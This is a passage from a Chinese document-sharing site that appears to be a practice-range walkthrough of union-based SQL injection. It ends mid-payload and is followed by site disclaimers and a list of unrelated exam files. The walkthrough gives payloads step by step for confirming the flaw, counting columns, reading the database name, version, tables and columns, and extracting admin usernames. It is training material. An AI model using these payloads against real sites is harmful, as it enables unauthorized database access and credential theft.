已阅读5页,还剩4页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
靶场位置:/?a=battle&f=target&id=485e58d0afa7e4f7第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车页面返回正常构造 ?id=1 and 1=2 ,回车页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车页面正常继续构造 ?id=1 and 1=1 order by 2 回车页面正常继续构造 ?id=1 and 1=1 order by 3 回车页面异常,因此判断当前页面所使用的的数据表里有2个字段第三步:判断回显点因为判断字段数为2,所以构造 ?id=1 and 1=2 union select 1,2 回车页面出现了 2 ,说明我们可以在数字 2 处显示我们想要的内容。第四步:查询相关内容查询当前数据库名构造 ?id=1 and 1=2 union select 1,database() 回车查询当前数据库版本构造 ?id=1 and 1=2 union select 1,version() 回车查询当前数据库有哪些表构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车P.S:可通过修改红色处的数字来查询其他的表名,比如limit 1,1。这里我们想拿到的是目标的管理员账号密码,一般在admin表里,所以没有继续测试。查询admin表里有哪些字段构造?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=admin limit 0,1P.S:可通过修改红色处的数字来查询其他的字段名。查询到admin表里有三个字段,id ,username和password查询这些字段的内容构造?id=1 and 1=2 union select 1,username from admin limit 0,1 P.S:可通过修改红色处的数字来查询其他的内容。构造?id=1
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 桥梁安全教育题库及答案解析
- 2025白山事业单位考试题及答案
- 护理学基础中专试题题库及答案解析
- 传染病护理护考题库及答案解析
- 外勤机械工内部技能考核试卷及答案
- 金属材碱洗工质量追溯知识考核试卷及答案
- 手工火焰切割工岗位操作技能考核试卷及答案
- 2025年游艇出行测试题及答案解析
- 2025年商丘市永城市公开招聘幼儿园教师笔试模拟试题及答案解析(一)
- 2025年正高副高医院药学副主任药师考试题库历年真题模拟试题附答案
- 小学科学教学仪器配备标准
- 中医护理技术的质量与安全管理
- 证据法学-证明标准课件
- 质量管理程序文件汇总
- (完整版)高考英语考纲3500词汇表
- 国家开放大学电大《课程与教学论》形考任务3试题及答案
- 商务英语口语900句
- 辽宁省沈阳市基层诊所医疗机构卫生院社区卫生服务中心村卫生室名单目录信息
- 锅炉空预器清洗方案
- 药敏试验结果的解读
- DB14∕T 1319-2021 公路工程标准工程量清单及计量规范
评论
0/150
提交评论